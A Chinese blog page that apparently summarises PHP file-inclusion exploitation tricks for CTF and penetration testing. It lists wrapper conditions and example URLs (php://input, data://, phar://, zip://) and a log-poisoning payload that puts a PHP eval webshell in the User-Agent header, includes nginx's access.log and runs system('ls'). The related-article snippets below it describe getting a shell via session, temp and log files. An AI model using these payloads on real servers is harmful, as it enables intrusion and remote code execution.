自己遇到的文件包含各种姿势总结

最新推荐文章于 2022-10-07 09:55:18 发布
最新推荐文章于 2022-10-07 09:55:18 发布
阅读量180 收藏
点赞数
分类专栏: 文件包含 文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45655564/article/details/118569395
版权
这篇博客总结了PHP文件包含的各种情况,包括伪协议利用、日志包含攻击、session.upload_progress的条件竞争问题、open_basedir限制的规避、PHP LFI利用临时文件Getshell的方法,以及对php://filter的深入探讨,提供了安全防护建议。
摘要由CSDN通过智能技术生成

伪协议

allow_url_fopen=on
allow_url_include=on
php版本小于等于5.3.0
php://input

allow_url_fopen=on
allow_url_include没有要求
php://filter

allow_url_fopen=ON
allow_url_include=ON
php版本大于5.2
data://
或者利用data协议的base64编码

php版本大于等于5.3.0
phar://
index.php?file=phar://test.zip/phpinfo.txt

zip://
但使用zip协议,需要指定绝对路径,同时将#编码为%23,之后填上压缩包内的文件。
index.php?file=zip://D:\phpStudy\WWW\fileinclude\test.zip%23phpinfo.txt

日志包含

User-Agent:<?php eval($_POST[a]);?>
?file=/var/log/nginx/access.log
a=system(‘ls’);

session.upload_progress和条件竞争

https://www.cnblogs.com/NPFS/p/13795170.html

open_basedir

open_based

最低0.47元/天 解锁文章
Anfy1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件包含姿势——利用session.upload_progress进行文件包含
weixin_46330722的博客
12-25 1993
利用session.upload_progress进行文件包含
文件包含的利用姿势
weixin_30335575的博客
04-12 154
http://thief.one/2017/04/10/2/ 转载于:https://www.cnblogs.com/esthermalley/p/6699131.html
文件包含姿势~
NLost
10-07 1796
通过修改user-agent文件头为恶意代码,nginx在解析时会将网站的请求日志写入对应的log文件中(其实apache也类似)。
PHP漏洞全解————10、PHP文件包含漏洞
Fly_鹏程万里
07-05 8404
基本相关函数&lt;&gt;php中引发文件包含漏洞的通常是以下四个函数:include()include_once()require()require_once()reuqire() 如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。...
文件包含的各种姿势
sun的博客
05-27 571
文件包含漏洞原理 文件包含可以增加代码的重复使用,方便了开发人员,但是在带来方便的同时也给我们带来了很多安全方面的麻烦,因此我总结一下常见的文件包含漏洞的方式。 文件包含的方式 可以分为本地文件包含和远程文件包含,本地文件包含表示通过包含目标服务器上的文件来进行恶意代码的执行,我们通常需要构造自己的恶意代码并包含执行才能达到攻击服务器的目的,通常远程文件包含的的危害更大,因为恶意攻击者可以搭...
shell两个文件去重的多种姿势
09-15
总结,shell提供了多种方式来处理文件去重问题,选择哪种方法取决于具体需求,如文件大小、效率、资源消耗等因素。在实际应用中,根据实际情况选择合适的方法是关键。通过这些示例,你可以更好地理解和掌握shell在...
Mediapipe 模型文件
07-24
这可能是因为谷歌的某些更新或优化移除了这些文件,或者是因为特定版本的Mediapipe不再包含这些预训练模型。当遇到这样的问题时,开发者需要重新获取或编译缺失的模型文件,以确保Mediapipe项目能够正常运行。 ...
姿势:SpringBoot2.x启动全过程源码分析
01-27
这一过程包括获取或创建应用环境,配置property sources(属性源)和profiles(配置文件),确保环境变量、系统属性、配置文件等都被正确加载。 在创建Banner打印类之后,SpringBoot会根据应用类型创建相应类型的...
CV 自动化检测 YOLOV5 检测人物姿势
最新发布
01-04
内容概述:用于CV 自动化检测 YOLOV5 ...提供label_names有person和down的标签,down会包含在person标签里面,使用检测需要自己进修改,返回的当down标签和person的bbox重合时,则person标签的对象是down的,反之不是。
Pose-Estimation:姿势估计课程
05-16
1. 项目源代码:包含了实现姿势估计的Python脚本,可能包括数据预处理、模型调用、结果解析和可视化等部分。 2. 数据集:用于训练和测试模型的图像或视频文件,通常分为训练集、验证集和测试集。 3. 预训练模型:...
文件包含利用方式(总结)
PANDA墨森的博客
07-13 4284
一、利用思路总结: 1、包含一些敏感的配置文件,获取目标敏感信息 2、配合图片马getshell 3、包含临时文件getshell 4、包含session文件getshell 5、包含日志文件getshell(Apach、SSH等等) 6、利用php伪协议进行攻击 二、具体利用方法: ①包含一些敏感的配置文件 windows常见的敏感文件路径: C:\boot.ini //查看系统版本 C:\Windows\System32\inetsrv\MetaBase.xml //IIS配.
渗透测试之文件包含漏洞&利用姿势
qq_46217803的博客
07-14 1134
文件包含漏洞的分类 大体可以分为:本地文件包含和远程文件包含。顾名思义,引用本地文件,利用inchude包含函数包含本地(服务器)文件。什么是动态变量? 利用协议读取源代码 截断%00 这里假设漏洞代码为 长度截断 漏洞代码演示 与上面原理差不多,在1.txt中写下实例: php:// 实例 如果具有一定的写入权限,POST 写入一句话木马 ...
文件包含漏洞一览
Amire0x的小乐园
11-08 483
文件包含 原因 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 php的文件包含相关函数都是无论其参数的扩展名是什么,都会将其内 容作为php代码解析,这可能就会造成任意的php代码执行。 如果一个功能需要包含用户传来的参数时,且开发者又没有对用户的输入进行检测和过滤,那么就 很可能使攻击者利用该功能进行文件包含漏洞的攻击。 相关函数 引起该漏洞的通常是 include() include() 如果出错的话,只会提出警告,会继续执行后
文件包含技巧拓展】————4、文件包含漏洞(下)
Fly_鹏程万里
01-30 434
之前已经总结了一次文件包含漏洞相关的知识点,最近一段时间做CTF又遇到了不少以前没见过的包含新姿势,这里在总结一下,以后看的时候方便一些。 phar LFI 0x01 什么是phar文件 phar是一个文件归档的包,类似于Java中的Jar文件,方便了PHP模块的迁移。 php中默认安装了这个模块。 0x02 创建一个phar文件 在创建phar文件的时候要注意phar.readonl...
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
文件包含漏洞(绕过姿势)
求天下者,积少成多
06-01 9922
文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell.php代码内容:123<?p
本地文件包含漏洞详解
热门推荐
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含在 php 中,涉及到的危险函数有四个,分别是 inclu...
文件包含漏洞原理/利用方式/应对方案
wangyuxiang946的博客
07-16 1万+
用户利用文件包含函数上传可执行脚本文件,造成信息泄露或任意命令执行
文件包含漏洞(绕过姿势
heiseweiye的博客
09-19 7135
1.1文件包含漏洞的形成 文件包含就是代码注入的典型代表,PHP的文件包含可以直接执行包含文件的代码,而且包含文件的格式是不受限制的,因此如果我们在包含文件中输入恶意代码,就会导致文件包含漏洞,文件包含漏洞大多可以直接利用获取webshell。 文件包含函数主要有以下四个: include() include_once require() require_once() 他们之间的区别在于...
笔记本电脑使用与保养全攻略:正确姿势与维护要点
6. 附录:包含故障排除部分,提供了常见问题的解决方案,帮助用户解决日常使用中可能遇到的技术问题。 手册中的图图标示了重要的警告和提示,如禁止操作、注意人体安全、重点信息以及关于废弃电子产品的处理规定。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值